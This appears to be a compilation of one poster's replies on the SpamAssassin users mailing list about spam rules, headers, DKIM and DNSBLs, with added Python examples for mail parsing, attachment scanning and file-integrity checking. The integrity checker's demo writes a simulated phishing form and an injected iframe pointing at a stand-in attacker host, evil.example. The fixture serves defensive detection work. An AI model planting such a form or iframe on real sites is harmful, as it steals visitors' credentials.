Re: new kind of spam with bizarre custom headers getting through
Hi George,

At 11:02 04-09-2014, George Johnson wrote:
> I'm getting another slew of these this morning, all with a variety of strange headers added apparently to foil spam filtering. All are getting through my spamassassin set up, which is usually nearly bulletproof. Typical headers are:
>
> Imbrue-Gaol: 17169949.17169949
> Manila-Cairn: 12616748.12616748
> Atonic-Alate: 78c35d32dc879cf5ccd83e99e6458854
> Fungus-Onus: 1716994978c35d32dc879cf5ccd83e99e6458854
> Ernest-Phlox: 953-17169949
>
> I have Bayes, Uribl-black, Spamcop, Pyzor, Razor, etc., enabled. Here is one of the headers with my addresses redacted:

The odd headers change on each run. You should be able to catch them with Bayes.

Regards,
-sm
60_adsp_override_dkim.cf (was: Plans for a DMARC plugin ???)
Hi Mark,

At 04:15 30-04-2014, Mark Martinec wrote:
> If you want to implement a similar effect to the new yahoo and aol DMARC policy by SpamAssassin, use rules similar to the default rules in 60_adsp_override_dkim.cf:
>
>   adsp_override yahoo.com custom_med
>   adsp_override yahoo.com.ar custom_med
>   adsp_override yahoo.com.au custom_med
>   adsp_override yahoo.com.br custom_med
>   adsp_override yahoo.com.cn custom_med
>   adsp_override yahoo.com.hk custom_med
>   ...

I did a quick verification. The above domains do not publish an ADSP record.

Regards,
-sm
Re: FSL_HELO_BARE_IP_2 RCVD_NUMERIC_HELO
At 02:56 15-10-2013, Stan Hoeppner wrote:
> In both cases the last two Received: headers in each message are forgeries as no SMTP transaction occurred. I'm sure this violates more than one SMTP RFC, but I doubt Gmane will change the way they do this any time soon.

I don't think that there is any violation of the specification.

Regards,
-sm
Re: rdns in received header
At 13:42 21-02-2013, Kevin A. McGrail wrote:
> Unless betting for minor sums such as a beer or a happy meal, I generally won't get into RFC compliance arguments with DFS. My reading was similar though there are some other RFCs that extend SMTP and say things like if you use ESMTP, you have to add "with ESMTP" to the received headers.

The following is about ESMTP:

  For instance, servers MUST support the EHLO command even if they do not implement any specific extensions and clients SHOULD preferentially utilize EHLO rather than HELO.

Regards,
-sm
Re: rdns in received header
At 11:07 24-02-2013, Kevin A. McGrail wrote:
> I'm referring to other RFCs such as 1651 which says:

That's an obsoleted RFC. It might be better to refer to RFC 5321 (Section 4.4) for information about the Received: header.

Regards,
-sm
Re: wrong RCVD_IN_PBL?
Hi Andreas,

At 11:45 20-11-2012, Andreas Schulze wrote:
> I have a similar issue with a web.de (german webmail) user. He uses his iPhone to submit mail via web.de submission service. (TLS + Authentication) The message triggers RCVD_IN_PBL and others. Any hint to make those messages pass sa?

82.165.159.34 is listed in PBL ( http://www.spamhaus.org/pbl/query/PBL1532253 )

> Received: from mout-xforward.web.de (mout-xforward.web.de [82.165.159.34])
>     by idvmailin03.datev.de (Postfix) with ESMTP id 3Y5btV2sQ8z690G;
>     Tue, 20 Nov 2012 20:04:02 +0100 (CET)

The above would trigger that rule.

Regards,
-sm
Re: How to report a spam botnet
At 16:44 20-11-2012, Matt wrote:
> authenticated SMTP to relay not? Is there a way in apache .htaccess to block access based on xbl.spamhaus.org? I want to block exploited IP's from webmail etc as well.

http://www.lucaercoli.it/mod_spamhaus.html

Regards,
-sm
Re: SA rules matching of private addresses
Hi Mabry,

At 03:46 04-10-2012, Mabry Tyson wrote:
> The debug output shows that SA is (IMO, mis-) interpreting the x-originating-ip as a Received header.

The IP address from the X-Originating-IP header field, similarly to those in the Received header fields, is used for DNSBL lookups.

Regards,
-sm
Re: How to check from that is not on the header?
Hi Sergio,

At 08:09 26-09-2012, Sergio wrote:
> How can I check a FROM different to the one on the headers? I have seen that some emails on the FROM on the header have something different than the FROM on the email, as an example:
>
> FROM THE HEADERS:
>
> Received: from (127.0.0.1) by mail62.us1.rsgsv.net (PowerMTA(TM) v3.5r16) id hcc8go0lj3g4 for fernando.lo...@puntocel.com.gt; Wed, 26 Sep 2012 14:28:26 + (envelope-from bounce-mc.us4_769.128085-fernando.lopez=puntocel.com...@mail62.us1.rsgsv.net)
> Subject: =?utf-8?Q?Masaje=20de=20Reflexolog=C3=ADa=20de=20pies=20con=20sales=20minerales=20relajantes=20y=20aromaterapia?=
> From: =?utf-8?Q?Cucupons.com?= ma...@cucupons.com
> Reply-To: =?utf-8?Q?Cucupons.com?= ma...@cucupons.com
>
> But the FROM that I want to block is the one that comes on the email:
>
> FROM: bounce-mc.us4_7776669.128085-Aileen.Miffs=anyemail@mail62.us1.rsgsv.net
>
> I have the following rule:
>
>   header BLACKLIST_R From =~ /rsgsv\.net/i
>   score BLACKLIST_R 5.0

That's for the From: in the message header fields.

> But at the time of checking, it checks cucupons.com and the rule fails. What do I have to use in order to check the FROM that comes on the email instead of the FROM that is on the headers?

There is usually a Return-Path: header field which would have the bounce-mc.us4_769.128085-fernando.lopez=puntocel.com...@mail62.us1.rsgsv.net email address on the right-hand side. If you don't have that header field, you could base your rule on http://wiki.apache.org/spamassassin/EnvelopeSenderInReceived

Regards,
-sm
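The distinction the reply draws, between the author address in the From: header field and the envelope sender that ends up in Return-Path: (or in the envelope-from clause of the first Received: line), as an added example that is not part of the original thread. The message below is constructed and patterned on the headers quoted above, with placeholder addresses in place of the redacted ones; the regex used for the envelope-from clause and the function names are this example's own assumptions, not SpamAssassin's code.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Matches the "(envelope-from ...)" comment that some MTAs (PowerMTA in the
# quoted header) write into their Received: line. Assumed form, see lead-in.
ENVELOPE_FROM_RE = re.compile(r"\(envelope-from\s+<?([^\s<>()]+)>?\)", re.I)


def header_from(msg):
    """The author address in the From: header field (what a From rule sees)."""
    return parseaddr(msg.get("From", ""))[1].lower()


def envelope_sender(msg):
    """The SMTP envelope sender (MAIL FROM) recorded for this message.

    Prefer Return-Path:, which the delivering MTA writes from the envelope;
    otherwise fall back to an envelope-from clause in a Received: line.
    Returns None when neither is present or the sender is the null sender <>.
    """
    return_path = msg.get("Return-Path")
    if return_path is not None:
        return parseaddr(return_path)[1].lower() or None
    for received in msg.get_all("Received", []):
        m = ENVELOPE_FROM_RE.search(received)
        if m:
            return m.group(1).lower()
    return None


def sender_domain_matches(msg, domain_regex):
    """True when the envelope sender's domain matches domain_regex."""
    sender = envelope_sender(msg)
    if not sender or "@" not in sender:
        return False
    return re.search(domain_regex, sender.rsplit("@", 1)[1], re.I) is not None


# Constructed sample patterned on the Received:/From: lines quoted above, with
# placeholder addresses in place of the redacted ones.
SAMPLE = (
    "Received: from (127.0.0.1) by mail62.us1.rsgsv.net (PowerMTA(TM) v3.5r16) "
    "id hcc8go0lj3g4 for recipient@example.gt; Wed, 26 Sep 2012 14:28:26 +0000 "
    "(envelope-from bounce-mc.us4_769.128085-recipient=example.gt@mail62.us1.rsgsv.net)\n"
    "Subject: Masaje de pies\n"
    "From: \"Cucupons.com\" <mail@cucupons.com>\n"
    "Reply-To: \"Cucupons.com\" <mail@cucupons.com>\n"
    "\nbody\n")


def parse(raw):
    return message_from_string(raw)
```

A From rule sees cucupons.com; the envelope sender is what carries the rsgsv.net domain, and it is only visible through Return-Path: or the Received: comment. Note that a null sender (Return-Path: <>) yields None, so a rule on the envelope sender must decide separately what to do with bounces.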
Re: Responsibility of sites that hold user-created documents (was Re: One-line URI body spam)
At 13:03 19-10-2011, David F. Skoll wrote:
> In my dream world, people would blacklist Google. I made a suggestion

The approach would also be applicable for pastebin (which is generally suggested on this mailing list) and any other free service. The subject could be rewritten as "responsibility of free services that hold user-created documents".

Regards,
-sm
Re: blacklist based on authoritative nameservers of sender domain
At 16:52 22-08-2011, Adam Katz wrote:
> You can't do whois en-masse (I'd love that, but ...), so this means an NS host lookup. To determine if they are authoritative, that's another lookup (which I don't believe is necessary). A blocklist would also be another lookup (if using a BL, it could check the authoritativeness), but I don't think that's completely necessary either.

You don't need to use Whois. You already have the data:

  ;; ANSWER SECTION:
  apache.org.        1800    IN    A     140.211.11.131

  ;; AUTHORITY SECTION:
  apache.org.        86398   IN    NS    ns2.no-ip.com.
  apache.org.        86398   IN    NS    ns1.eu.bitnames.com.
  apache.org.        86398   IN    NS    ns2.surfnet.nl.
  apache.org.        86398   IN    NS    ns1.us.bitnames.com.

It's been a while since I tested this. If I recall correctly, it was prone to false positives. You might be able to do some scoring instead of blacklisting.

Regards,
-sm
Re: How to prevent SA to make as112 calls?
At 05:09 28-04-2011, Michelle Konzack wrote:
> It has nothing to do with my Mailserver, because SA makes the requests to other DNS servers and then I get the UDP-Flood alarm... See http://tools.ietf.org/html/draft-ietf-dnsop-as112-under-attack-help-help-05
>
> 04/24/2011 23:52:56 **UDP flood** 192.168.0.69, 17549- 173.45.100.146, 53 (from COM1 Outbound)

You can create the zones mentioned in http://tools.ietf.org/html/draft-ietf-dnsop-default-local-zones-15

Regards,
-sm
Re: Score on sender domain by country
Hi Ram,

At 23:34 10-04-2011, Ramprasad wrote:
> One of our clients has a purely local business and wants any mail coming from a foreign domain to be given a score for spam. I would like to reduce the spam threshold, and then give a negative score for every mail with sender domain in India. Is there a possibility of identifying the country where a domain is registered? Identifying by tld seems incorrect.

No. You mentioned that using the ccTLD for negative scoring isn't what you want. If you assume that senders will be sending the mail from an IP address (or ASN) generally used within the country, you can put in a score for such a rule. You may have to allow some exceptions (e.g. by domain name).

Regards,
-sm
Re: SpamAssassin Integration
At 05:18 17-06-10, Matt Kettler wrote:
> The best docs would be the RFC standards:
>
> RFC 2822 Internet Message Format
> RFC 822 (obsoleted by above, but sometimes useful for understanding the history of the format, making intent clearer.)

RFC 2822 is obsoleted by RFC 5322.

Regards,
-sm
Re: rsys4.com and Paypal?
At 10:18 20-04-10, LuKreme wrote:
> I got a mail from Paypal, but it is not FROM paypal, but it appears to have passed DKIM

If it passed DKIM and it is signed by info.paypal.com, it's from Paypal.

Regards,
-sm
RE: [LinkedIn Spam] Re: unwhitelist from_dkim?
At 15:11 19-03-10, Chris Richman wrote:
> If anyone knows of a reliable way to identify mailing list addresses, I'd love to know so we could block mail to them. Currently, we just do it when it's reported to us. I suppose one approach might be to block list.* domains or email addresses in the format *-l...@.* or other common mailing list address formats. It wouldn't catch all of them, I'm sure (m...@gnome.org, for example), but it might help.

There isn't a reliable way to identify mailing list addresses.

Regards,
-sm
Re: MTAmark (was: MTX plugin functionally complete?)
At 02:56 15-02-10, Per Jessen wrote:
> I went to google mtamark, and came across a few discussions on mailing lists (e.g. at www.sage.org) as well as an article in iX (German IT magazine) in 2005. The proposal was certainly discussed quite a bit, but it's not very clear what then happened. I also saw a few links to personal pages at space.net, but they're long gone.

There is experimental support for MTAMARK in a well-known MTA. The proposal had less exposure than SPF.

Regards,
-sm
Re: SA on outgoing SMTP
Hi Alexandre,

At 10:44 16-02-10, Alexandre Chapellon wrote:
> I have a quite buggy customer network, full of zombie PCs that spend all day sending spam and wasting the whole reputation of my networks.

Do they send these messages through your mail server?

> As a result it sometimes becomes quite hard to deliver queues for specific domains such as Yahoo!'s hosted ones. Indeed they have some temp fail (blacklist) mechanism that forbids my servers to send messages to them for hours. That's why I would like to set up some outgoing filtering to avoid sending too much spam through my mail relays. I think SA can help me in doing so, but I know too it's not really intended to work this way. I guess SA expects to work on MX hosts more than on smtp relays.

You can still run some SpamAssassin tests to catch some of the spam.

> My prerequisites are mainly:
> - STOP as much spam as possible at SMTP time (before queuing)

As this is outgoing, post-SMTP filtering is not much of an issue.

> Furthermore I can't rely on RBL because a lot of my dyn IP addresses are regularly listed on different blacklists.

Relying on other people to tell you that there is a problem on your network is not a good idea. Sign up for feedback loops. Rate limit mail submissions or set up triggers to identify abnormalities. You may also wish to do traffic flow analysis to see what's going through your network.

Regards,
-sm
Re: SA on outgoing SMTP
At 13:49 16-02-10, Alexandre Chapellon wrote:
> Mostly not, but those who are doing so get my mail servers blacklisted from time to time. (And I don't really care about dyn IP addresses being on blacklists... for now)

Your subnet will probably be blacklisted. As this is not the right venue to talk about escalation, I won't get into that.

> This is what I am doing... but I'd like to know if someone has done it too and how efficient it is.

It can be quite efficient. If you are going to use a stock installation, it may not be as efficient. The efficiency also depends on the user-base.

> I don't want to set this up if it won't change my reputation and just cause some false positives.

It won't change your reputation overnight. You will also have to overcome the growing pains if you have never used SpamAssassin.

> It definitely is when hitting the problem of false positives... I can't let a user think we sent his mail when we wrongly dropped it.

I am not talking about dropping mail. False positives _will_ happen.

Regards,
-sm
Re: Pipe characters in From and To's
Hi Spiro,

At 13:37 11-02-10, Spiro Harvey wrote:
> We're getting a boatload of To and From addresses starting with pipe characters on one of our clients' mailservers. The messages themselves don't appear particularly malicious -- the ones we've seen are just pill spam -- but there are craploads of them.

If it's in the To address and you know that the local-part does not exist, you can configure your MTA to reject the message.

> So I'm just wondering if others encounter this with enough regularity,

Yes.

> and if so what your thoughts and advice are. I don't particularly want to add rules into sendmail, so SA is my avenue of choice.

Having a rule in sendmail is less work.

Regards,
-sm
Re: Hostkarma: to be or not to be in SA defaults
Hi Marc,

At 09:32 30-09-2009, Marc Perkel wrote:
> I have a lot of mighty servers set up and have servers at 4 locations. I have 50mb bought and using about 30 of it now. I am not sure what it takes to support a default SA inclusion. Does anyone know if what I described sounds like it is enough?

They can still be a soft target. Most of the DNSBLs were unprepared to deal with denial of service attacks. Some of them have closed down after an attack. That can be a problem for users as most people have a configure-and-forget setup or it's a default vendor setup.

The bandwidth may be enough for current usage. The more mirrors you have, the better. If your DNSBL is effective, you might be able to get help with that. The problems with your setup are not worse than other resources that are commonly used by users from this mailing list. Someone pointed out that it's not a good idea to do more DNS lookups as it affects the performance of SpamAssassin.

It does not matter whether your DNSBL is included in the default configuration as people will use it if they believe that it is effective in stopping spam. If you are concerned about marketing, then it may matter to you. :-)

Regards,
-sm
Setting a Reply-To header for this mailing list (was: [sa] Re: Any one interested in using a proper forum?)
At 10:27 28-07-2009, Charles Gregory wrote:
>   :0fw
>   * ^(To|Cc):.*(use...@spamassassin|spamassassin.users)
>   | /usr/bin/formail -I "Reply-To: users@spamassassin.apache.org"

Match on the List-Id: header instead of the To: or Cc:.

Regards,
-sm
Re: Spam Filter Law Suit
Hi Damian,

The content of this message should not be taken as advice. Please seek proper legal advice.

At 11:59 14-07-2009, Damian Mendoza wrote:
> Anyone else being sued by Southwest Technology Innovations regarding spam filtering? It's odd that they would name my old company (Workgroup Solutions) since they have very few installations (2 person reseller) compared to the others named. Any opinions or feedback?

According to http://wiki.apache.org/spamassassin/SpamAssassinHistory the SpamAssassin source code was publicly available in April 2001. Previously, there was a context/keyword spam filter called filter.plx ( http://spamassassin.apache.org/prehistory/ ). I don't know whether the patent about "enhancing touch and feel on the Internet" is related to your questions.

Regards,
-sm
Re: OT: Website protection
At 05:06 11-07-2009, schmero...@gmail.com wrote:
> One of our client's websites gets hacked frequently - 1x per month - usually with some kind of phishing scam. I understand their first line of defense is to make sure security is tight and systems are up to date, however, it seems to me that there must be some scanning utility that would check their site for unauthorized pages via a search for domain names.

If they are compromised regularly, they should go to the source of the problem and fix it. You could scan the file system to look for unauthorized files. You cannot do that for webpages. As the system is compromised, you cannot rely on the scan.

> Any ideas where to look for such a beast /or a mailing list that deals with this type of issue?

Search for tripwire.

Regards,
-sm
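A minimal tripwire-style file integrity check of the kind the reply points at, as an added example that is not part of the thread and not tripwire's code: hash every file under the document root into a baseline, then diff a later scan against it to surface dropped phishing pages and modified files. The directory layout and file contents in the demo are constructed. The caveat from the reply applies to the design: the baseline must live off the web host (or on read-only media), because an attacker who has rewritten index.html can rewrite a local baseline just as easily.

```python
import hashlib
import json
import os
import tempfile


def hash_file(path, chunk=65536):
    """SHA-256 of a file, streamed so large uploads do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map each regular file under root (relative POSIX path) to its digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue              # a symlink can point anywhere; hash real files only
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def compare_manifests(baseline, current):
    """Return (added, modified, removed) relative paths, each sorted."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return added, modified, removed


def save_manifest(manifest, path):
    # Write the baseline somewhere the web server cannot modify it: a separate
    # host, read-only media, or at least a location the web user cannot write.
    with open(path, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed scenario: baseline a tiny site, then simulate a phishing
    kit drop plus an injected iframe, and return what the comparison reports."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<html>ok</html>")
    with open(os.path.join(root, "images", "logo.png"), "wb") as f:
        f.write(b"\x89PNG")
    baseline = build_manifest(root)
    with open(os.path.join(root, "images", "paypal-login.html"), "w") as f:
        f.write("<form action='http://evil.example/collect'>...</form>")
    with open(os.path.join(root, "index.html"), "a") as f:
        f.write("<iframe src='http://evil.example/'></iframe>")
    return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        root, baseline_path = sys.argv[1], sys.argv[2]
        current = build_manifest(root)
        if not os.path.exists(baseline_path):
            save_manifest(current, baseline_path)
            print("baseline written to", baseline_path)
        else:
            for label, paths in zip(("ADDED", "MODIFIED", "REMOVED"),
                                    compare_manifests(load_manifest(baseline_path), current)):
                for p in paths:
                    print(label, p)
    else:
        print(demo())
```

Run it once with the document root and a baseline path to record the clean state, then from cron against the same baseline; any ADDED or MODIFIED line in the web root that does not correspond to a known deploy is the unauthorized page the poster was looking for.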
Re: mailbox-list in sender: header?
At 03:57 09-07-2009, McDonald, Dan wrote:
> I recently received a spam with a mailbox-list in the from: and sender: headers
>
> From: Inversiones inversiones.fo...@live.com, i...@lasinversionesforex.com
> Sender: Inversiones inversiones.fo...@live.com, i...@lasinversionesforex.com
>
> Since I had not seen mailbox-lists in a from: header before, I ran to read rfc5322:
>
> [snip]
>
> Clearly, this message failed this section. Would multiple addresses in either the From: or Subject: headers be a useful spam rule? Is that construct used often somewhere that I'm not familiar with?

Did you mean Sender: header instead of Subject: header? Multiple addresses rarely appear in the From: header. It's better to have a rule for the multiple addresses in the Sender: header if you are receiving a lot of spam with the above headers.

Regards,
-sm
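The check the reply recommends, counting mailboxes in Sender: (defined in RFC 5322 as a single mailbox) and From:, as an added example that is not part of the thread and not a SpamAssassin rule. The two messages are constructed, patterned on the headers quoted above with placeholder addresses; the second one shows the edge case a naive "count the commas" regex gets wrong, a comma inside a quoted display name.

```python
from email import message_from_string
from email.utils import getaddresses


def mailbox_count(msg, field):
    """Number of mailboxes in an address header. email.utils parses the
    RFC 5322 address grammar, so a comma inside a quoted display name is not
    mistaken for a list separator (a naive regex on ',' would count it)."""
    values = msg.get_all(field, [])
    return sum(1 for _name, addr in getaddresses(values) if addr)


def mailbox_list_abuse(msg):
    """Headers carrying more than one mailbox: Sender: is defined as a single
    mailbox, and a From: list is legal but almost never seen in real mail."""
    return [f for f in ("Sender", "From") if mailbox_count(msg, f) > 1]


# Constructed sample patterned on the headers quoted above (placeholder addresses).
SPAM = message_from_string(
    "From: Inversiones <inversiones@example.com>, <info@example.net>\n"
    "Sender: Inversiones <inversiones@example.com>, <info@example.net>\n"
    "Subject: x\n\nbody\n")

# Legitimate message: the comma in the quoted display name is not a separator.
HAM = message_from_string(
    'From: "Doe, Jane" <jane@example.org>\n'
    'Sender: "Doe, Jane" <jane@example.org>\n'
    "Subject: x\n\nbody\n")
```

In a SpamAssassin header rule the same test ends up as a regex on the raw Sender: value, which is exactly where the quoted-comma case has to be handled explicitly; the parsed approach above sidesteps it.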
Re: twitter spam why RCVD_IN_DNSWL?
At 08:31 09-07-2009, Bob Proulx wrote:
> I just wanted to confirm that I am seeing twitter invite spam that appears AFAICT to be from twitter.com to addresses that are not and never have been associated with Twitter. Mostly moderated mailing lists. It looks to me like there is some type of interface at Twitter that allows a user to upload a list of email addresses and invite them to use Twitter. Probably because addresses exist in a user's mailbox they get spammed by Twitter with an invite.

That's social networks spam. Your friends are happy to upload their address book to those sites so that you can be spammed. :-) If you are running mailing lists, don't whitelist those domains. That also applies if you don't want to be spammed by those domains.

Regards,
-sm
Re: constantcontact.com
At 10:56 05-07-2009, rich...@buzzhost.co.uk wrote:
> Well, I can only take you at face value that you are here representing Constant Contact. If I call up the office switchboard Tara, can I speak with you there? It's just I've called up Constant Contact and hit #9 for the directory and your name is not in there? Perhaps there is a misspelling or something?

The name is spelled correctly. I consider that the person is speaking on behalf of that organization based on the message posted ( http://mail-archives.apache.org/mod_mbox/spamassassin-users/200907.mbox/%3cac9ad70907041849m735b0b68mb0909b83216b0...@mail.gmail.com%3e )

Regards,
-sm
Re: constantcontact.com
At 11:00 06-07-2009, rich...@buzzhost.co.uk wrote:
> Have you handled spam or irate customer getting spam from Constant Contact?

I prefer not to comment on that.

> What do you think about Constant Contact having a white list score in Spamassassin despite being listed in the multi.uri?

There are several other domains which are on that list. You can remove a domain from the white list if you believe that it does not belong in it.

> What do you think about them being white listed by Barracuda?

As this mailing list is about SpamAssassin, I don't think that it matters around here.

Regards,
-sm
Re: Apache.org spam??
At 08:10 25-06-2009, Jeremy Morton wrote:
> I recently got this spam that made its way thru SpamAssassin:

[non-persistent information snipped]

> Looks like it was received from mail.apache.org which is in the DNSWL.org DB, unsurprisingly. Why would mail.apache.org send out this obvious spam?

The message was sent by a mailing list subscriber to a list which generally discusses spam. It scored 4.0 on Apache.org. Why is the message obvious spam? What rules would you recommend to catch it?

Regards,
-sm
Re: Apache.org spam??
At 09:13 25-06-2009, Benny Pedersen wrote:
> something as this on apache.org:
>
>   header __RESENT1 exists:Resent-From
>   header __RESENT2 exists:Resent-To
>   header __RESENT3 exists:Resent-Date
>   header __RESENT4 exists:Resent-Message-Id
>   meta NO_RESENT_MAIL (__RESENT1 && __RESENT2 && __RESENT3 && __RESENT4)
>   describe NO_RESENT_MAIL Meta: please dont resend mail to maillists
>   score NO_RESENT_MAIL 3.0
>
> if i cant fix others problems but imho apache.org need the above :)

Nice. The above rules cannot be applied for all apache.org traffic as it's not only for mailing lists.

Regards,
-sm
Re: unclosed if error
At 08:32 22-06-2009, Jean-Paul Natola wrote:
> I copied this rule from someone here on the list
>
>   header __CTYPE_MULTIPART_ANY Content-Type =~ /multipart\/\w/i
>   ifplugin Mail::SpamAssassin::Plugin::MIMEHeader
>   mimeheader __ANY_TEXT_ATTACH Content-Type =~ /text\/\w+/i
>   meta MIME_NO_TEXT (__CTYPE_MULTIPART_ANY && !__ANY_TEXT_ATTACH)
>   score MIME_NO_TEXT 2.00
>   describe MIME_NO_TEXT No text body parts end if
>
> and this error comes up when I run lint
>
>   [35143] warn: config: unclosed 'if' in /usr/local/etc/mail/spamassassin/jp.cf: if plugin (Mail::SpamAssassin::Plugin::MIMEHeader)

The "end if" should not be in the describe line. Add "endif" after the describe line to close the ifplugin condition. See http://mail-archives.apache.org/mod_mbox/spamassassin-users/200906.mbox/%3cpine.lnx.4.64.0906020849430.10...@mercury.impsec.org%3e

Regards,
-sm
RE: unclosed if error
At 12:20 22-06-2009, Jean-Paul Natola wrote:
> I have it like this now
>
>   header __CTYPE_MULTIPART_ANY Content-Type =~ /multipart\/\w/i
>   ifplugin Mail::SpamAssassin::Plugin::MIMEHeader
>   mimeheader __ANY_TEXT_ATTACH Content-Type =~ /text\/\w+/i
>   meta MIME_NO_TEXT (__CTYPE_MULTIPART_ANY && !__ANY_TEXT_ATTACH)
>   score MIME_NO_TEXT 2.00
>   describe MIME_NO_TEXT No text body parts
>   endif
>
> and this is the error
>
>   [39338] warn: config: unclosed 'if' in /usr/local/etc/mail/spamassassin/jp.cf: if plugin (Mail::SpamAssassin::Plugin::MIMEHeader)
>   [39338] warn: config: unclosed 'if' in /usr/local/etc/mail/spamassassin/jp.cf: if plugin (Mail::SpamAssassin::Plugin::MIMEHeader)

Tar the jp.cf file and send it to me off-list.

Regards,
-sm
Re: Lots of 419/scam and investment spams getting through suddenly
At 22:59 18-06-2009, Chip M. wrote:
> Here's a dump of the complete Countries routes of your samples (frequency first, then square brackets around the IP immediately outside your own network):
>
>   2 [France], Nigeria

Do you really get such emails from Nigeria? :-)

Regards,
-sm
Re: Lots of 419/scam and investment spams getting through suddenly
At 15:36 19-06-2009, McDonald, Dan wrote:
> Of course. Don't you? Although usually the Nigerians relay through Italy, and sometimes Hong Kong.

I don't see any email of that type originating from Nigeria in terms of SMTP. Most of these emails originate from other countries. Blocking Italy or Hong Kong won't help that much because of the mode of operation of these senders. One of the advantages of SpamAssassin is that it doesn't use one specific rule to detect spam. If you rely on one specific rule only, it will be subverted.

Regards,
-sm
Re: Lots of 419/scam and investment spams getting through suddenly
At 17:26 19-06-2009, RW wrote:
> The last hop into the internal network is rarely from Nigeria, but I find it turns up in X-Spam-Relay-Countries in about 9% of my own spam.

Can you send me a sample of the email headers off-list?

Regards,
-sm
Re: List headers and footers [Re: Unsubscribe]
At 05:08 16-06-2009, McDonald, Dan wrote:
> Altering message bodies might break gpg|pgp signatures, but not DKIM.

It generally invalidates the DKIM signature. This mailing list does not use Mailman.

Regards,
-sm
Re: 419 scams in .doc and .rtf attachments
At 10:41 16-06-2009, Rosenbaum, Larry M. wrote:
> We get a significant number of 419 scam letters where the actual spam text is in a Word (.doc or .rtf) or PDF attachment. Example:

Don't limit yourself to that. Think of the next step.

> It would be really great if there was an SA plugin to extract the text from the attachment and then feed the text to the regular SA body rules. Has anybody looked at that possibility?

See http://wiki.apache.org/spamassassin/FuzzyOcrPlugin

It is possible to modify that plugin to call the wv library to extract the content. If you want to use regular rules, you would have to render the content before passing the modified message to SpamAssassin.

Regards,
-sm
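The render-then-scan approach the reply describes, as an added example that is not part of the thread and is neither the FuzzyOcr plugin nor SpamAssassin's code: walk the MIME parts of a message, render attachments we know how to read to plain text, and run body-style patterns over the rendered text. The message and its RTF attachment are constructed; the RTF-to-text routine is this example's own and is assumed sufficient for simple letters (it is not a complete RTF parser, and a production setup would call a real converter such as the wv library mentioned above for .doc); the two patterns are illustrative stand-ins for body rules, not rules from any ruleset.

```python
import base64
import re
from email import message_from_string

RTF_WORD = re.compile(r"\\([A-Za-z]+)(-?\d+)? ?")
# Destination groups whose content is metadata, not document text.
IGNORED_GROUPS = ("fonttbl", "colortbl", "stylesheet", "info", "pict")


def rtf_to_text(rtf):
    """Minimal RTF-to-text conversion (assumption: enough for simple letters,
    not a full RTF parser). Keeps literal text, \\par/\\line breaks and \\'hh
    escapes; drops formatting control words and the groups listed above."""
    out, stack, skip = [], [], 0           # skip > 0 while inside an ignored group
    i, n = 0, len(rtf)
    while i < n:
        c = rtf[i]
        if c == "{":
            ignored = skip > 0 or rtf.startswith("{\\*", i) or any(
                rtf.startswith("{\\" + g, i) for g in IGNORED_GROUPS)
            stack.append(ignored)
            if ignored:
                skip += 1
            i += 1
        elif c == "}":
            if stack and stack.pop():
                skip -= 1
            i += 1
        elif c == "\\" and i + 1 < n and rtf[i + 1] == "'":    # \'hh: one cp1252 byte
            if skip == 0:
                out.append(bytes([int(rtf[i + 2:i + 4], 16)]).decode("cp1252", "replace"))
            i += 4
        elif c == "\\" and i + 1 < n and rtf[i + 1] in "\\{}":  # escaped literal
            if skip == 0:
                out.append(rtf[i + 1])
            i += 2
        elif c == "\\":
            m = RTF_WORD.match(rtf, i)
            if m is None:                       # \* and other symbols: not text
                i += 1
                continue
            if skip == 0 and m.group(1) in ("par", "line"):
                out.append("\n")
            elif skip == 0 and m.group(1) == "tab":
                out.append("\t")
            i = m.end()
        else:
            if skip == 0 and c not in "\r\n":   # raw newlines are not RTF text
                out.append(c)
            i += 1
    return "".join(out).strip()


# Attachment content types we can render; a text/plain part is only treated as
# an attachment when it carries a filename (the message body is scanned anyway).
EXTRACTORS = {"application/rtf": rtf_to_text, "text/rtf": rtf_to_text,
              "text/plain": lambda s: s}


def attachment_texts(msg):
    """Yield (filename, rendered text) for every attachment we can render."""
    for part in msg.walk():
        if part.is_multipart() or not part.get_filename():
            continue
        render = EXTRACTORS.get(part.get_content_type())
        if render is None:
            continue
        raw = part.get_payload(decode=True) or b""
        yield part.get_filename(), render(raw.decode(part.get_content_charset() or "latin-1", "replace"))


# Illustrative patterns standing in for body rules (assumed, not SpamAssassin's).
RULES = {
    "ADV_FEE_NEXT_OF_KIN": re.compile(r"\bnext of kin\b", re.I),
    "ADV_FEE_MILLION": re.compile(r"\bUS\$?\s*[\d.,]+\s*million\b", re.I),
}


def score_attachments(msg):
    """Names of the patterns above that match any rendered attachment."""
    return sorted({name for _, text in attachment_texts(msg)
                   for name, rx in RULES.items() if rx.search(text)})


# Constructed sample: a 419-style letter carried only in an RTF attachment.
RTF_SAMPLE = (r"{\rtf1\ansi\deff0{\fonttbl{\f0\fswiss Arial;}}{\colortbl;\red0\green0\blue0;}"
              r"\f0\fs24 Dear Friend,\par I am the next of kin of a late contractor. "
              r"The sum of US$10.5 million is waiting\'85\par}")
SAMPLE_MSG = message_from_string(
    "From: sender@example.org\nTo: you@example.net\nSubject: Re: proposal\n"
    "MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary=\"B\"\n\n"
    "--B\nContent-Type: text/plain; charset=us-ascii\n\nPlease see attached.\n"
    "--B\nContent-Type: application/rtf; name=\"letter.rtf\"\n"
    "Content-Disposition: attachment; filename=\"letter.rtf\"\n"
    "Content-Transfer-Encoding: base64\n\n"
    + base64.b64encode(RTF_SAMPLE.encode("ascii")).decode("ascii") + "\n--B--\n")
```

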